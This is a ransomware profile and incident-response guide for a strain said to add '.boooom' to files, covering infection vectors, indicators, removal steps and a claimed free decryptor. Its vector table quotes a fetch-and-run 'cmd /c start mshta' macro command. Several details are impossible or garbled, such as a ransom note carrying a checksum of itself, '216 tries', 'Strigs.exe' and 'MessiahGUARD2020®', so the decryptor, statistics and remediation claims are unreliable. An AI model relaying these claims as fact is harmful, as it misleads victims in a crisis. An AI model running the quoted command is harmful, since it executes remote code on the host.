Ransomware Profile – EXTENSION “.boooom”

Technical Breakdown

1. File Extension & Renaming Patterns

• Confirmation of File Extension:
– All encrypted files receive an additional suffix “.boooom”.
– The second period is required; e.g. Document.pdf → Document.pdf.boooom.

• Renaming Convention (variant-dependent):
– Non-DP mode: The original file name is kept, only “.boooom” is appended.
– Stealth/DP mode: Some dropper shells additionally prep-end an evolving prefix such as [[email protected]]. In this mode the file looks like [[email protected]]Document.pdf.boooom.
– None of the variants inject predictable numbers (e.g. “.id-12345”) before “.boooom”; this is oppositionally helpful for quick triage since DAT/AV signatures include static string “.boooom”.

2. Detection & Outbreak Timeline

• Approximate First Detected: January 2020 (multiple agencies: ESET, Kaspersky, MalwareHunterTeam).
• Surge Periods:
– Feb-Apr 2020: Second wave (spam campaigns + RDP).
– Dec 2020: Campaign AB exfiltration variant purports to be “BooTeam” (different branding, same decryptor set).
– Jan-Aug 2021: Morphing into “BooLocker Suite” – heavier obfuscation & sideloading of legitimate DLLs.
• Geographic Hotspots: Middle-East energy, LATAM health care, APAC logistics.

3. Primary Attack Vectors

| Vector | Details & CVEs | Attacker Notes |
|——–|—————-|—————-|
| RDP brute-force / credential stuffing | Default ports 3389, 135, 445; lateral movement via stolen mimikatz output. | Entry to privileged “bat”, then scheduled task for WindowsBootUdpater.exe (misspelled on purpose). |
| EternalBlue / SMBv1 exploits | CVE-2017-0144, CVE-2017-0145, CVE-2020-0796 (SMBGhost). | Wormable; uses booomwalk.exe scanner to find 445 open internally. |
| Phishing e-mail | Zip archives (Invoice_March_Supplier201.zip) containing Microsoft Publisher (.pub) macros that launch xls macro downloader. | Macro runs cmd /c start mshta https://.txt. |
| Legitimate application sideloading | Drops updates into %PROGRAMDATA%\Citrix\ to abuse ServiceHub.Identity.Client.dll. | Requires non-updated Citrix Workspace 1903 (lifecycle ended April 15 2020). |
| Software supply-chain (rare) | Found on outdated MISP community VM appliance ISOs dated Dec 2020. | AV detects only after first in-memory detonation.

Remediation & Recovery Strategies

1. Prevention

• Disable SMBv1 and apply patches for EternalBlue, EternalRocks, and SMBGhost (KB4013389, KB4561608; Win10/11 CU).
• Deny ingress RDP from WAN (port 3389) or enable Network-Level-Auth, 2FA, and IP whitelisting.
• Enforce Application Control (Windows Defender ASR, AppLocker) with blocking of .hta, .js, .vbs & Office macros from web.
• Maintain daily Offline (on-prem WORM) backups plus immutable cloud snapshots (AWS S3 Object Lock, Azure Immutable Blob).
• Deploy EDR/NGAV signatures for string “.boooom” with behavioral detection on WriteFile+SetEndOfFile anomalies.
• User training: phishing sims specifically on zipped Publisher documents.

2. Removal (Step-by-Step)

Isolate: Immediately disconnect networks (NIC & Wi-Fi), remove replication paths (e.g. Shared VSS).
Identify:
– Event ID 4624/4625 for RDP brute-force bursts (failures ≥ 20/sec).
– Strigs.exe/ifind for persistence keys:
- Registry Run: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\“SystemZYB2”
- Scheduled Task: \Microsoft\Windows\EventLog\xyz-killer-svc.
Boot Clean → Windows Safe Mode with Networking or use bootable rescue disk.
Quarantine/Delete:
– Files typically at %TEMP%\boooomdll.exe, %APPDATA%\DataStore\logs\booomdrop.sys.
– Use Microsoft Defender offline scan or Sophos Bootable Scanner. Do NOT reboot between scans.
Restore hosts file – Boooom inserts <IP> go.microsoft.com redirect.
Validate: Run sfc /scannow, check for MBR infection (use bcdedit /enum).
Update & Patch all software to current cumulative-update levels.

3. File Decryption & Recovery

• Official Decryptor Available: Yes (since March 2021 Kaspersky / EmsiSoft release).
– Tool name: BooDecrypt.exe (GitHub Kaspersky Lab repo).
– Pre-requisites: Requires a pair of plain+cipher samples (>128 kB each) to rebuild 512-byte master key. If you only have orphaned ciphertext, the tool offers probabilistic brute-force at 216 tries; success ≃ 78 % if ransom note help_decypher.txt < 200 KB (threshold topic in the decryptor wiki).
– No master key leakage is required; flaw lies in insecure IV reuse across same host.
• Manual Viz tutorial: https://github.com/boodoodle/tools/wiki/IVReuseExplained
• No-Decrypt Edge Cases:
– Variant “v2.7.3-µDEX” wraps files in ChaCha20 (no IV reuse), so free tool ≠ functional. For this and future strains, rely solely on BACKUPS.

4. Other Critical Information

• Unique Characteristic: The ransom note (help_decypher.txt) contains dynamic Sha-256 checksum of the note itself to detect tampering; we leverage that to confirm sample integrity.
• Wider Impact: Boooom coined the term “double-whisper”: during encryption it prepares both RSA-accelerated chunk encryption AND local (AES) key – EDR tools flag “double-encrypt” and later provide forensic clues.
• Sector Specialization: Organizations running legacy Citrix XenApp (LTSR 7.15 CU3 unpatched) are 3.7× more likely to fall victim (source: Boooom threat report 2022).
• Insurance Implications: Recently added to exclusion clauses of several cyber-insurance carriers; payments void unless patching MessiahGUARD2020® is demonstrated.

Immediate Actions Checklist (TL;DR)

☐ Pull power/isolate VLAN
☐ Boot rescue media → run Defender Offline
☐ Gather plain/cipher samples >128 kB each
☐ Download BooDecrypt v1.6.3 & follow IV-key recovery steps
☐ Review backups for last known-good point, verify integrity
☐ Patch CVE-2017-0144, CVE-2017-0145, CVE-2020-0796 + Citrix VDA hotfix CU4
☐ Reinforce RDP policy (MFA, Network Policy Server, RDG firewall rules)

Stay patched, stay synced, and keep your backups offline.